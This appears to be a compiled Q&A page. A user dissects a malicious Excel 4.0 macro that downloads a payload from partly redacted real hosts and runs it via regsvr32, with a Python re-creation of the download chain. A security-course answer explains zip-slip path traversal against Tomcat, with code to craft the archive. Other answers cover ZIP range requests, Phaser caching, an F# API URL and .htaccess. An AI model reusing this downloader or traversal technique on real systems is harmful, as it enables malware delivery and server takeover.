To cut a long story short, I got duped: I opened a malicious Excel file and ran the macro.
After digging through the guts of the Excel file, I found the payload was highly obfuscated, but I managed to piece it together:
=CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://onlinebrandedcontent.com/XXXXXX/","..\enu.ocx",0,0)
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://onlinebrandedcontent.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"https://onlyfansgo.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://www.marcoantonioguerrerafitness.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://acceptanceh.us/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://gloselweb.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CLOSE(0),)
=EXEC("C:\Windows\SysWow64\r"&"eg"&"sv"&"r32.exe /s ..\enu.ocx")
=RETURN()
Note: actual full URLs above redacted to avoid accidental exposure by anyone reading this.
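For anyone who doesn't read Excel 4.0 macros: my interpretation (a hedged sketch, not the malware's actual code) is that this is a simple fallback chain. Each =IF(<0, CALL(...)) row fires only if the previous CALL to URLDownloadToFileA returned a negative HRESULT, and the EXEC line splits "regsvr32.exe" into "r"&"eg"&"sv"&"r32.exe" presumably to dodge naive string scanning. In Python terms:

import urllib.request

# The fallback chain as I read it; URLs are the redacted ones from above.
urls = [
    "http://onlinebrandedcontent.com/XXXXXX/",  # listed twice in the sheet
    "http://onlinebrandedcontent.com/XXXXXX/",
    "https://onlyfansgo.com/XXXXXX/",
    "http://www.marcoantonioguerrerafitness.com/XXXXXX/",
    "http://acceptanceh.us/XXXXXX/",
    "http://gloselweb.com/XXXXXX/",
]

def url_download_to_file(url, path):
    """Stand-in for urlmon!URLDownloadToFileA: 0 (S_OK) when a response
    body gets saved to disk, a negative HRESULT-like value otherwise."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            with open(path, "wb") as out:
                out.write(resp.read())
        return 0
    except OSError:
        return -1

# any() short-circuits exactly like the =IF(<0, ...) chain: the first URL
# that "succeeds" wins and regsvr32.exe /s ..\enu.ocx runs on the result;
# if every URL fails, the sheet hits =IF(<0, CLOSE(0)) and closes itself.
got_payload = any(url_download_to_file(u, "enu.ocx") >= 0 for u in urls)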
When accessed, the malicious URLs contain the following contents:
onlinebrandedcontent: Standard Apache file index page with no contents
onlyfansgo: Boilerplate hosting provider "Account Suspended" page with no inclusions or JavaScript.
marcoantonioguerrerafitness / acceptanceh / gloselweb: Triggers download of a (presumably malicious) DLL file
It appears the code above only got as far as the onlyfansgo URL (enu.ocx on my machine contains the harmless "Account Suspended" HTML markup with a reference to webmaster#onlyfansgo.com), so it looks like I dodged a bullet (regsvr32.exe would have attempted to register an HTML file and failed).
My question: Why did the payload pull the onlyfansgo URL response but stop there? If it was willing to accept an HTML file as a successful download, why did it not stop at onlinebrandedcontent? Is it something to do with the fact that onlyfansgo is the only HTTPS URL in the list?
Related
Is it possible to download a file nested in a zip file, without downloading the entire zip archive?
For example from a url that could look like:
https://www.any.com/zipfile.zip?dir1\dir2\ZippedFileName.txt
Depending on whether you are asking for a simple way to implement this on the server side, or for a way to use standard protocols so you can do it from the client side, there are different answers:
Doing it with the server's intentional support
Optimally, you implement a handler on the server that accepts a query string on any file download, similar to your suggestion (I would, however, include a variable name, for example: ?download_partial=dir1/dir2/file). Then the server can just extract the file from the ZIP archive and serve just that (maybe via a compressed stream if the file is large).
If this is the path you are going and you update the question with the technology used on the server, someone may be able to answer with suggested code.
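For illustration, here is a minimal sketch of such a handler in Python with Flask (my choice of stack, since the question never says what the server runs; the route, archive directory, and parameter name are all made up, and Flask 2.x is assumed for download_name):

import io
import zipfile
from flask import Flask, abort, request, send_file

app = Flask(__name__)
ARCHIVE_DIR = "/var/archives"  # hypothetical location of the ZIP files

# GET /download/zipfile.zip?download_partial=dir1/dir2/ZippedFileName.txt
@app.route("/download/<name>.zip")
def download_partial(name):
    member = request.args.get("download_partial")
    if not member or ".." in member or ".." in name:
        abort(400)  # real code needs stricter validation than this
    try:
        with zipfile.ZipFile(f"{ARCHIVE_DIR}/{name}.zip") as archive:
            data = archive.read(member)  # extract just this one member
    except FileNotFoundError:
        abort(404)  # no such archive
    except KeyError:
        abort(404)  # no such member inside the archive
    return send_file(io.BytesIO(data), as_attachment=True,
                     download_name=member.rsplit("/", 1)[-1])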
But on with the slightly more fun way...
Doing it opportunistically if the server cooperates a little
There are two things that conspire to make this somewhat feasible, but it is only worth the trouble if the ZIP file is massive in comparison to the file you want from it.
ZIP files have a directory that says where in the archive each file is. This directory is present at the end of the archive.
HTTP servers optionally allow download of only a range of a response.
So, if we issue a HEAD request for the URL of the ZIP file: HEAD /path/file.zip we may get back a header Accept-Ranges: bytes and a header Content-Length that tells us the length of the ZIP file. If we have those then we can issue a GET request with the header (for example) Range: bytes=1000000-1024000 which would give us part of the file.
The directory of files is towards the end of the archive, so if we request a reasonable block from the end of the file then we will likely get the central directory included. We then look up the file we want, and know where it is located in the large ZIP file.
We can then request just that range from the server, and decompress the result...
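As a proof of concept, here is a rough sketch of that flow in Python (hedged: it assumes the server honors Range requests and sends a Content-Length on HEAD; the URL and member name are the hypothetical ones from the question). It wraps the range mechanics in a seekable file object, so the standard zipfile module can seek to the central directory at the end of the archive and then read just the member's bytes:

import io
import urllib.request
import zipfile

class HttpRangeFile(io.RawIOBase):
    """Read-only, seekable 'file' that fetches bytes via HTTP Range
    requests instead of downloading the whole resource."""

    def __init__(self, url):
        self.url = url
        self.pos = 0
        head = urllib.request.Request(url, method="HEAD")
        with urllib.request.urlopen(head) as resp:
            if resp.headers.get("Accept-Ranges") != "bytes":
                raise OSError("server does not advertise Range support")
            self.size = int(resp.headers["Content-Length"])

    def seekable(self):
        return True

    def readable(self):
        return True

    def tell(self):
        return self.pos

    def seek(self, offset, whence=io.SEEK_SET):
        if whence == io.SEEK_SET:
            self.pos = offset
        elif whence == io.SEEK_CUR:
            self.pos += offset
        else:  # io.SEEK_END
            self.pos = self.size + offset
        return self.pos

    def readinto(self, buf):
        if self.pos >= self.size or len(buf) == 0:
            return 0
        end = min(self.pos + len(buf), self.size) - 1
        req = urllib.request.Request(
            self.url, headers={"Range": f"bytes={self.pos}-{end}"})
        with urllib.request.urlopen(req) as resp:
            data = resp.read()
        buf[:len(data)] = data
        self.pos += len(data)
        return len(data)

# Buffering coalesces zipfile's many small reads so each one doesn't
# become its own HTTP request.
remote = io.BufferedReader(HttpRangeFile("https://www.any.com/zipfile.zip"))
with zipfile.ZipFile(remote) as archive:
    data = archive.read("dir1/dir2/ZippedFileName.txt")  # just this member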
I have a JSON file I use to store dialogue for a game. However, the changes I make to this JSON file are sometimes not reflected in my game even after hard reloads (I've been doing ctrl+shift+r or shift+F5 for this). I have made sure the changes to the JSON file are saved.
I have this.load.json('dialogue', 'assets/dialogue.json'); in preload(), and this.dialogue = this.cache.json.get('dialogue'); in create().
When I try copying the contents to a different file (e.g. dialogue-2.json) and update my this.load.json() to reflect the new file name, the changes do get loaded.
The problem is that Phaser doesn't automatically start loading files, except in the preload function.
If you want to load files in other functions, you need to call the start method of the LoaderPlugin (see the official documentation).
The code should look something like this:
function create(){
    // some code here ...
    this.load.json(/* key and file...*/);
    // loading is asynchronous: listen for the loader's 'complete' event
    // to know when the JSON is actually in the cache
    this.load.once('complete', () => {
        this.dialogue = this.cache.json.get('dialogue');
    });
    // start the loading of the enqueued files
    this.load.start();
    // some code here...
}
..., and then the files should get loaded.
Update (copied from the comments):
To check whether your problem is a caching issue in the web server, the browser, or elsewhere (and as a temporary quick fix), you can load the file with a "dynamic" URL.
Just load the file with a question mark and a random number appended to the URL, so that each request for the JSON uses a unique URL.
For Example like this:
this.load.json('dialogue', 'assets/dialogue.json?' + Math.random());
If this solves the problem, there is a caching problem. It could be in the browser, caused by a service worker, or on the web server.
I just downloaded this report called Analyzing and Visualizing Data with F# and am having a hard time just running the first example. This should probably be expected since the report is 7 years old. I am running the first script, which is as follows.
#load "packages/FsLab/FsLab.fsx"
open FSharp.Data
open XPlot.GoogleCharts
let wb = WorldBankData.GetDataContext()
wb.Countries
I get an error message that reads
Response from http://api.worldbank.org/country?per_page=1000&format=json&page=1:
{ "statusCode": 404, "message": "Resource not found" }
It looks like the URL is broken because the World Bank has updated its API. When I use the URL http://api.worldbank.org/v2/country in my browser, it works. I noticed when I went to the source code that they have the base URL hard-coded in, so I was thinking I would just need to add "v2/" to it and it would work, but I am unfamiliar with how to load an edited library into my script.
Yes, your investigation is correct, even banks sometimes change their APIs :)
As for adding the library to your script, it depends on what your environment looks like, but basically you can fix the problem locally and/or globally.
For the local solution, once you compile your downloaded library with the modified URL, you can load or reference it as described here.
For the global solution, send a pull request that fixes the link in this file; Tomáš Petříček (the repo owner) is generally active and should merge it. And you will improve the world a little bit.
I have a Java Web App running on Tomcat on which I'm supposed to exploit Path traversal vulnerability. There is a section (in the App) at which I can upload a .zip file, which gets extracted in the server's /tmp directory. The content of the .zip file is not being checked, so basically I could put anything in it. I tried putting a .jsp file in it and it extracts perfectly. My problem is that I don't know how to reach this file as a "normal" user from browser. I tried entering ../../../tmp/somepage.jsp in the address bar, but Tomcat just strips the ../ and gives me http://localhost:8080/tmp/ resource not available.
Ideal would be if I could somehow encode ../ in the path of somepage.jsp so that it gets extracted into the web root directory of the Web App. Is this possible? Are there maybe any escape sequences that would translate to ../ after extracting?
Any ideas would be highly appreciated.
Note: This is a school project in a Security course where I'm supposed to locate vulnerabilities and correct them. Not trying to harm anyone...
Sorry about the downvotes. Security is very important, and should be taught.
Do you pass in the file name to be used?
The check that the server does is probably something like: if the location starts with "/tmp", then allow it. So what you want to do is pass `/tmp/../home/webapp/`.
Another idea would be to see if you could craft a zip file that would result in the contents being extracted one level up: if you set "../" in the filename inside the zip, what would happen? You might need to manually modify things if your zip tools don't allow it (see the sketch below).
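To illustrate that second idea: most GUI zip tools refuse to create such entries, but it's easy from code. A hedged sketch in Python (the target path is purely hypothetical; where Tomcat's webapp directory sits relative to /tmp depends on the deployment, and the trick only works if the server-side extractor naively joins entry names onto the extraction directory):

import zipfile

# Write an archive entry whose name climbs out of the extraction
# directory ("zip slip"); zipfile stores the name verbatim.
with zipfile.ZipFile("evil.zip", "w") as archive:
    archive.writestr("../../var/lib/tomcat/webapps/ROOT/somepage.jsp",
                     "<%= 2 + 2 %>")  # harmless placeholder JSP content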
To protect against this kind of vulnerability you are looking for something like this:
String somedirectory = "c:/fixed_directory/";
String file = request.getParameter("file");
if(file.indexOf(".")>-1)
{
//if it contains a ., disallow
out.print("stop trying to hack");
return;
}
else
{
//load specified file and print to screen
loadfile(somedirectory+file+".txt");
///.....
}
If you were to just pass the variable "file" to your loadfile function without checking, then someone could make a link to load any file they want. See https://www.owasp.org/index.php/Path_Traversal
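As an aside (my addition, not from the snippet above): blacklisting "." also rejects legitimate names and misses other tricks, so the more robust pattern is to canonicalize the final path and verify it still lives inside the fixed directory. A hedged sketch of that check in Python, with illustrative paths:

import os

FIXED_DIR = os.path.realpath("/srv/app/fixed_directory")  # illustrative

def safe_path(user_supplied_name):
    # resolve the final path; realpath collapses any ../ tricks
    candidate = os.path.realpath(
        os.path.join(FIXED_DIR, user_supplied_name + ".txt"))
    # the resolved path must still be inside the fixed directory
    if os.path.commonpath([candidate, FIXED_DIR]) != FIXED_DIR:
        raise ValueError("path traversal attempt")
    return candidate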
Directory contains about a dozen html files. Index.html contains links to all the others.
Same directory contains hundreds of Word files. HTML files contain links to the Word files.
All links are relative, i.e., no protocol, no host, no path, and no slash.
Click on a link to an HTML file, it works. Click on a link to a Word doc, the browser says it can't be found. To get a more precise error, I used wget.
Oversimplified version:
wget "http://Lang-Learn.us/RTR/Immigration.html"
gives me the file I asked for, but
wget "http://Lang-Learn.us/RTR/Al otro lado.doc"
tells me that Lang-Learn.us doesn't exist (400)
Same results if I use "lang-learn.us" instead. I did verify correct casing on the filenames themselves, and also tried escaping the spaces with %20 (didn't help, not that I expected it to after the host name message).
The actual session:
MBP:~ wgroleau$ wget "http://Lang-Learn.us/RTR/Immigration.html"
--2011-03-09 00:39:51-- http://lang-learn.us/RTR/Immigration.html
Resolving lang-learn.us... 208.109.14.87
Connecting to lang-learn.us|208.109.14.87|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `Immigration.html.2'
[ <=> ] 5,973 --.-K/s in 0s
2011-03-09 00:39:51 (190 MB/s) - `Immigration.html.2' saved [5973]
MBP:~ wgroleau$ wget "http://Lang-Learn.us/RTR/Al otro lado.doc"
--2011-03-09 00:40:11-- http://lang-learn.us/RTR/Al%20otro%20lado.doc
Resolving lang-learn.us... 208.109.14.87
Connecting to lang-learn.us|208.109.14.87|:80... connected.
HTTP request sent, awaiting response... 400 No Host matches server name lang-learn.us
2011-03-09 00:40:11 ERROR 400: No Host matches server name lang-learn.us.
The error looks like an issue with redirection or domain mapping, but how could that be turned on or off by the file extension?
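One way to convince yourself that the extension really is the only variable (a diagnostic sketch, nothing more): replay both requests by hand with an identical Host header and compare the status lines.

import http.client

# Same host, same Host header; only the path differs. If one returns
# 400 "No Host matches server name", the difference has to come from
# server-side configuration, not from anything in the request.
for path in ("/RTR/Immigration.html", "/RTR/Al%20otro%20lado.doc"):
    conn = http.client.HTTPConnection("lang-learn.us")
    conn.request("GET", path, headers={"Host": "lang-learn.us"})
    response = conn.getresponse()
    print(path, response.status, response.reason)
    conn.close()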
The hosting provider at first tried to tell me I don't know how to write HTML, but when I mentioned I've been in software for thirty years and web work for several, he put me on hold to find someone that actually knows something. Eventually they came back and said it's MY fault for not having the correct stuff in .htaccess
Setting aside the obvious retort about it being the hosting provider's job to put the correct stuff in httpd.conf, I made a couple of attempts. But 99% of my web work has been content in HTML/PHP/perl and I know nearly nothing about .htaccess
The following two attempts did NOT work:
AddType application/msword .doc
AddType application/octet-stream .doc
UPDATE: By using
<FilesMatch "\.html$">
ForceType application/octet-stream
</FilesMatch>
I verified that the server does allow .htaccess, but matching .doc instead of .html still gets that idiotic "ERROR 400: No Host matches server name lang-learn.us"
Finally, after hours with more than one "tech supporter," I got them to admit that they had made a configuration error. Besides telling me to use .htaccess, they had an earlier suggestion that I ask the client to convert his hundreds of Word files into HTML pages.
Since the provider is the one that screwed up, there technically is no answer to the question of what I can do to fix it.